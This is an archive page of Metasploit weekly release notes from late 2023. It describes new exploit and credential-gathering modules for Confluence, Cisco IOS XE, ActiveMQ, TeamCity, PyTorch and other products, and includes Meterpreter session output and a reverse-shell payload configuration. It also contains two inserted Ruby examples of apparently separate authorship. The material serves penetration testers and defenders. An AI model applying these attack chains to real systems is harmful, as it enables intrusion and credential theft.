Tag Archives: Metasploit Weekly Wrapup

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

  • #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

  • #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
  • #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation


You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal


Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

  • #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

Documentation added (1)

  • #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat


This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that got a great deal of attention: CVE-2023-46604 targeting Apache MQ resulting in ransomware deployment and CVE-2023-20198 targeting Cisco IOS XE OS.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

  • #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
  • #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator filtered out valid credentials whenever the hostname was not an exact match, even though credentials for a domain (e.g. windomain.local) should also work against a host in that domain (e.g. dc.windomain.local).
  • #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.
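The ccache hostname-matching change above raises a question a practitioner should be able to answer precisely: when does a cached credential stored for a domain cover a given target host? The following is an added example, not Metasploit's own code, showing one reasonable rule: a credential for a domain covers that domain and any host or subdomain beneath it, compared label by label and case-insensitively, so `windomain.local` covers `dc.windomain.local` but not `evilwindomain.local` (a naive string suffix check would get that last case wrong). The `Credential` struct, the `host` field and the sample cache entries are assumptions constructed for this illustration.

```ruby
# Added example (not Metasploit's own code): choosing which cached Kerberos
# credentials may be used for a target host. The domain-coverage rule below is
# this example's assumption, not a copy of the framework's implementation.

# Minimal stand-in for a ccache entry: who the ticket is for and which
# host or domain it was stored against. (Assumed shape, for illustration.)
Credential = Struct.new(:principal, :host, keyword_init: true)

# True when +hostname+ is +domain+ itself or lies beneath it. The check is
# label-aligned: the host must end with "." + domain, so "evilwindomain.local"
# is NOT inside "windomain.local". Comparison ignores case and a trailing dot.
def host_in_domain?(hostname, domain)
  host = hostname.to_s.downcase.chomp('.')
  dom = domain.to_s.downcase.chomp('.')
  return false if host.empty? || dom.empty?

  host == dom || host.end_with?(".#{dom}")
end

# Return every credential whose stored host/domain covers +target_host+.
# A credential stored for a specific host (dc.windomain.local) does not
# cover its parent domain, only the domain-level entry does.
def usable_credentials(credentials, target_host)
  credentials.select { |c| host_in_domain?(target_host, c.host) }
end

# Constructed sample cache entries (not real credentials).
SAMPLE_CREDENTIALS = [
  Credential.new(principal: 'administrator@WINDOMAIN.LOCAL', host: 'windomain.local'),
  Credential.new(principal: 'svc@WINDOMAIN.LOCAL', host: 'dc.windomain.local'),
  Credential.new(principal: 'user@OTHER.LOCAL', host: 'evilwindomain.local'),
].freeze

if __FILE__ == $PROGRAM_NAME
  %w[dc.windomain.local windomain.local evilwindomain.local].each do |target|
    names = usable_credentials(SAMPLE_CREDENTIALS, target).map(&:principal)
    puts "#{target}: #{names.inspect}"
  end
end
```

The label-aligned comparison is the part worth keeping in mind: relaxing an exact-match rule to "ends with the domain" without the leading dot would let a credential for one domain be offered to an unrelated host whose name merely shares a suffix.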

Bugs fixed (1)

  • #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync


This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control


Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal (@rootxharsh), Rahul Maini (@iamnoooob), SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

  • #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
  • #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
  • #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
  • #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

  • #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
  • #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system still.

Documentation added (1)

  • #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and killing stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/10/19/metasploit-weekly-wrap-up-32/

That Privilege Escalation Escalated Quickly


This release features a module leveraging CVE-2023-22515, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a privilege escalation, but quickly recategorized as a “broken access control” with a CVSS score of 10. The exploit itself is very simple and easy to use so there was little surprise when CISA published an advisory stating that threat actors were using it in the wild. It is imperative that anyone using the affected versions mitigate risk and patch as quickly as possible.

Improved sessions searching

This release enhances the sessions command with additional search filters, for instance:

sessions -S 'session_id:1 session_id:5'
sessions -S 'session_type:meterpreter'
sessions -S 'last_checkin:greater_than:1h10m last_checkin:less_than:2h'

These search options can be used in conjunction with other session options. For instance the --verbose flag:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -v

Active sessions
===============

  Session ID: 8
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50564 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 4d78f75abbdbf0c8/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 18003s ago @ 2023-10-19 15:45:30 +0100
  Registered: No

  Session ID: 9
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WINDEV
      Tunnel: 192.168.123.1:4444 -> 192.168.123.132:50565 (192.168.123.132)
         Via: exploit/windows/smb/psexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 48d32692e0633293/x86=1/windows=1/2023-10-19T19:44:23Z
     CheckIn: 10803s ago @ 2023-10-19 17:45:30 +0100
  Registered: No

Or as an easy way to search for and kill matching stale sessions with --kill-all:

msf6 exploit(windows/smb/psexec) > sessions -S 'last_checkin:greater_than:2h30m' -K
[*] Killing matching sessions...

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50540 (192.168.123.132)
  5         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV  192.168.123.1:4444 -> 192.168.123.132:50555 (192.168.123.132)

[*] 192.168.123.132 - Meterpreter session 4 closed.
[*] 192.168.123.132 - Meterpreter session 5 closed.
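To make the filter syntax above concrete, here is an added example, not Metasploit's own code, of a small parser and matcher for the three filter keys the post shows (`session_id`, `session_type`, and `last_checkin` with `greater_than`/`less_than` and durations such as `1h10m`). The `Session` struct, the sample sessions, and the combination rules (values for the same id/type key are OR'd, multiple `last_checkin` bounds are AND'd so they form a range, and different keys are AND'd) are this example's assumptions about the behaviour shown, not a description of the framework's implementation.

```ruby
# Added example (not Metasploit's own code): parse and apply the session
# search filters shown above against a list of sessions.
require 'time'

# Minimal session record; the real framework object has many more fields.
Session = Struct.new(:id, :type, :last_checkin, keyword_init: true)

FILTER_KEYS = %w[session_id session_type last_checkin].freeze

# Parse a duration such as "1h10m", "2h" or "45s" into seconds.
# Rejects anything that is not a sequence of <number><unit> pairs.
def parse_duration(str)
  units = { 'd' => 86_400, 'h' => 3600, 'm' => 60, 's' => 1 }
  rest = str.to_s
  raise ArgumentError, 'empty duration' if rest.empty?

  total = 0
  until rest.empty?
    m = rest.match(/\A(\d+)([dhms])/)
    raise ArgumentError, "bad duration: #{str.inspect}" unless m

    total += m[1].to_i * units[m[2]]
    rest = m.post_match
  end
  total
end

# Split "session_id:1 session_type:meterpreter last_checkin:greater_than:1h"
# into [key, value] pairs, rejecting unknown keys and empty values early so a
# typo in the key cannot silently match nothing.
def parse_filter(query)
  query.split.map do |token|
    key, value = token.split(':', 2)
    raise ArgumentError, "unknown filter key: #{key.inspect}" unless FILTER_KEYS.include?(key)
    raise ArgumentError, "missing value for #{key}" if value.nil? || value.empty?

    [key, value]
  end
end

# Does one [key, value] clause hold for +session+ at time +now+?
def matches?(session, key, value, now)
  case key
  when 'session_id'   then session.id == Integer(value)
  when 'session_type' then session.type == value
  when 'last_checkin'
    op, dur = value.split(':', 2)
    age = now - session.last_checkin # seconds since the session last checked in
    case op
    when 'greater_than' then age > parse_duration(dur)
    when 'less_than'    then age < parse_duration(dur)
    else raise ArgumentError, "unknown last_checkin operator: #{op.inspect}"
    end
  end
end

# Apply a whole filter string. Assumed combination rules: repeated
# session_id/session_type values are alternatives (OR); repeated
# last_checkin bounds all have to hold (AND), which is what makes
# "greater_than:1h10m less_than:2h" a range; different keys are AND'd.
def search_sessions(sessions, query, now: Time.now)
  clauses = parse_filter(query).group_by(&:first)
  sessions.select do |s|
    clauses.all? do |key, pairs|
      results = pairs.map { |_, v| matches?(s, key, v, now) }
      key == 'last_checkin' ? results.all? : results.any?
    end
  end
end

# Constructed sample data loosely mirroring the output above: two fresh
# sessions, one stale meterpreter session and one shell session of middling age.
NOW = Time.parse('2023-10-19 20:45:30 +0100')
SAMPLE_SESSIONS = [
  Session.new(id: 4, type: 'meterpreter', last_checkin: NOW - 60),
  Session.new(id: 5, type: 'meterpreter', last_checkin: NOW - 120),
  Session.new(id: 8, type: 'meterpreter', last_checkin: NOW - 18_003),
  Session.new(id: 9, type: 'shell',       last_checkin: NOW - 5_400),
].freeze

if __FILE__ == $PROGRAM_NAME
  stale = search_sessions(SAMPLE_SESSIONS, 'last_checkin:greater_than:2h30m', now: NOW)
  puts "stale sessions: #{stale.map(&:id).inspect}"
end
```

Run the file directly to list the sessions older than 2h30m; the functions can also be required from a console. Failing loudly on an unknown key or a malformed duration matters in practice: with `--kill-all` the set of matched sessions is what gets killed, so a filter that silently matched nothing (or everything) would be the worse failure mode.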

New module content (2)

Apache Superset Signed Cookie RCE

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Exploit
Pull request: #18351 contributed by h00die
Path: linux/http/apache_superset_cookie_sig_rce

Description: This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.

Atlassian Confluence Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18461 contributed by sfewer-r7
Path: multi/http/atlassian_confluence_rce_cve_2023_22515

Description: This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions 8.0.0 through 8.3.2, 8.4.0 through 8.4.2, and 8.5.0 through 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware, then uploads a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created; this requires a manual clean-up.

Enhancements and features (7)

  • #17689 from manishkumarr1017 – Adds an additional column to the creds command to additionally show any cracked passwords that have been created by the auxiliary/analyze/crack_databases module or similar.
  • #18364 from zgoldman-r7 – Add support for filtering sessions based on last checkin time, session type and id.
  • #18381 from sjanusz-r7 – Adds new options -r and --reload-libs to the check, recheck, to_handler, reload, run and rerun commands. This new option will reload all library files before performing the original command.
  • #18428 from AleksaZatezalo – This PR adds documentation for the mssql_login module.
  • #18438 from adfoster-r7 – Makes improvements to the UX for database management prompts. Now when running msfdb init the user is no longer prompted for database deletion. The message for clearing unused data service credentials has been reworded.
  • #18450 from adfoster-r7 – Adds support for Ruby 3.3.0-preview2.
  • #18451 from adfoster-r7 – Updates the newly added cracked password column as part of the creds to work with the remote database.

Bugs fixed (3)

  • #18442 from adfoster-r7 – Improves stability of msfdb initialization on windows environments. Previously the msfdb init script would hang indefinitely on Windows environments, as well as there being false negatives on detecting if the database was running or not.
  • #18443 from adfoster-r7 – Adds a fix for the handler/reverse_ssh module that was returning warnings when msfconsole was booted on a Windows machine.
  • #18449 from adfoster-r7 – Fixes an issue with the scanner/mysql/mysql_authbypass_hashdump module to now correctly close sockets.

Documentation added (1)

  • #18452 from jheysel-r7 – Updates the Metasploit Wiki to include information on how to run quality tools on module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/10/13/metasploit-weekly-wrap-up-31/

Pollution in Kibana


This week, contributor h00die added a module that leverages a prototype pollution bug in Kibana prior to version 7.6.3. Specifically, this issue is within the Upgrade Assistant and enables an attacker to execute arbitrary code. The vulnerability can be triggered by sending a query that sets a new constructor.prototype.sourceURL directly to Elasticsearch, or by using Kibana to submit the same query. Note that Kibana needs to be restarted, or telemetry collection has to run, before the payload executes. This vulnerability does not appear to have been assigned a CVE. The module was written based on a detailed description from Alex Brasetvik (alexbrasetvik) in a HackerOne report.

Torch chain attack

Our very own zeroSteiner added a module that exploits PyTorch model server by chaining multiple vulnerabilities. First, it takes advantage of a weak default configuration that binds the management interface to all IP addresses. Then, once it reaches the management interface, the module exploits a Server-Side Request Forgery vulnerability (CVE-2023-43654) to register MAR (Model Archive) model files from arbitrary servers. Finally, it leverages a vulnerability in SnakeYaml (CVE-2022-1471) that allows code execution when a YAML file is deserialized by SnakeYaml. The module embeds a malicious YAML file in a MAR file and gets an arbitrary Java class executed when this MAR file is loaded.

Updated MySQL version support

Thanks to the work of Rory McKinley, multiple MySQL modules now support authentication against newer MySQL 8.0 versions. This required a lot of effort unearthing and patching historical code across multiple contributions to the Metasploit codebase, and to the Ruby MySQL library dependency. MySQL module highlights include:

  • auxiliary/scanner/mysql/mysql_login – Bruteforce and manual verification of MySQL credentials
  • auxiliary/scanner/mysql/mysql_version – MySQL Server Version Enumeration
  • auxiliary/scanner/mysql/mysql_hashdump – MySQL password hashdump support
  • auxiliary/scanner/mysql/mysql_schemadump – Extracting MySQL schema details
  • auxiliary/admin/mysql/mysql_sql – Run arbitrary MySQL SQL queries against a given target

New module content (2)

Kibana Upgrade Assistant Telemetry Collector Prototype Pollution

Authors: Alex Brasetvik (alexbrasetvik) and h00die
Type: Exploit
Pull request: #18417 contributed by h00die
Path: linux/http/kibana_upgrade_assistant_telemetry_rce

Description: Kibana before version 7.6.3 suffers from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we’re able to execute arbitrary code in the context of the Kibana user. There is no CVE for this at the moment.

PyTorch Model Server Registration and Deserialization RCE

Authors: Gal Elbaz, Guy Kaplan, Idan Levcovich, Spencer McIntyre, and Swapneil Kumar Dash
Type: Exploit
Pull request: #18427 contributed by zeroSteiner
Path: multi/http/torchserver_cve_2023_43654

Description: This PR adds a module that exploits PyTorch TorchServer by chaining an SSRF vulnerability with a deserialization RCE vulnerability to permit an unauthenticated remote attacker arbitrary Java code execution. The PR also fixes how the ClassLoader mixin handles datastore options.

Enhancements and features (6)

  • #18171 from dwelch-r7 – This fixes an issue when users use a payload while framework is started with the --defer-module-loads flag set. This also adds a new feature flag option, defer_module_loads, which, when enabled, defers module loads by default without the need to specify --defer-module-loads every time the framework boots. Finally, this comes with a sizable improvement in framework's boot-up time.
  • #18256 from jmartin-tech – Performs a routine update of multiple library dependencies.
  • #18296 from rorymckinley – Updates multiple MySQL modules to support authenticating with newer versions of MySQL.
  • #18383 from cgranleese-r7 – This adds a variety of improvements to the enum_computers module, including shell and PowerShell support as well as improvements when running on non-English systems.

Bugs fixed (2)

  • #18411 from rtpt-erikgeiser – Fixes an issue where the services -R command generated invalid hosts such as 192.0.2.2% if an empty string was registered for the scope metadata instead of nil.
  • #18431 from zeroSteiner – This switches the way in which port forwarded IPs are displayed so that the local IP is listed under local and the remote IP is listed under remote.

Documentation added (1)

  • #18394 from errorxyz – This adds documentation for the auxiliary/scanner/http/http_traversal module.
  • #18435 from h00die – Fixes multiple spelling mistakes in the Wiki.
  • #18444 from h00die – Fixes spelling mistakes in module documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap Up

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2023/10/06/metasploit-weekly-wrap-up-30/

New module content (3)

LDAP Login Scanner


Author: Dean Welch
Type: Auxiliary
Pull request: #18197 contributed by dwelch-r7
Path: scanner/ldap/ldap_login

Description: This PR adds a new login scanner module for LDAP. Login scanners are the classes that provide functionality for testing authentication against various different protocols and mechanisms. This LDAP login scanner supports multiple types of authentication including: Plaintext, NTLM, Kerberos and SChannel.

Junos OS PHPRC Environment Variable Manipulation RCE

Authors: Jacob Baines, Ron Bowes, and jheysel-r7
Type: Exploit
Pull request: #18389 contributed by jheysel-r7
Path: freebsd/http/junos_phprc_auto_prepend_file

Description: This adds an exploit module that leverages a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. This vulnerability is identified as CVE-2023-36845 and allows an attacker to achieve unauthenticated remote code execution as a low privileged user. This module also includes a jailbreak feature that consists in changing the root password and establishing an SSH session as the root user. The original password is restored when the module terminates.

Progress Software WS_FTP Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18414 contributed by sfewer-r7
Path: windows/http/ws_ftp_rce_cve_2023_40044

Description: This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

AttackerKB Assessment: (https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis)

Enhancements and features (6)

  • #17919 from bcoles – This PR adds support for starting and stopping Windows services using the service control manager to shell payloads.
  • #18338 from smashery – This PR updates the kerberos.rb library so that when a Kerberos login is attempted for a user on whom pre-authentication is not required, the module now requests an RC4-HMAC ticket, since it is more easily crackable.
  • #18363 from j0ev – This PR adds support to outputting payloads in octal in both framework and venom.
  • #18412 from zeroSteiner – This adds additional usage tips to Metasploit, expanding the pool that is selected from on startup.
  • #18420 from smashery – This PR updates the user-agent string reported by our HTTP payloads. We update this periodically to make sure that our payloads don't stick out by having an older user-agent string.
  • #18425 from adfoster-r7 – Adds history support to the nasm and metasm shells. Now when re-opening these shells, previously typed commands should be remembered and available.

Bugs fixed (1)

  • #18372 from gcarmix – Fixed an issue in the generic shell download command.

Documentation added (3)

  • #18277 from cnnrshd – This PR adds new documentation for how to create a command injection exploit module.
  • #18347 from bwatters-r7 – This PR updates the how-to-write-a-check-method docs to better explain to not use fail_with to align with best practices when making sure a check method returns a check code.
  • #18393 from adfoster-r7 – Updates the running modules landing page on the Wiki with more beginner friendly information on searching for and running modules.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution


This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
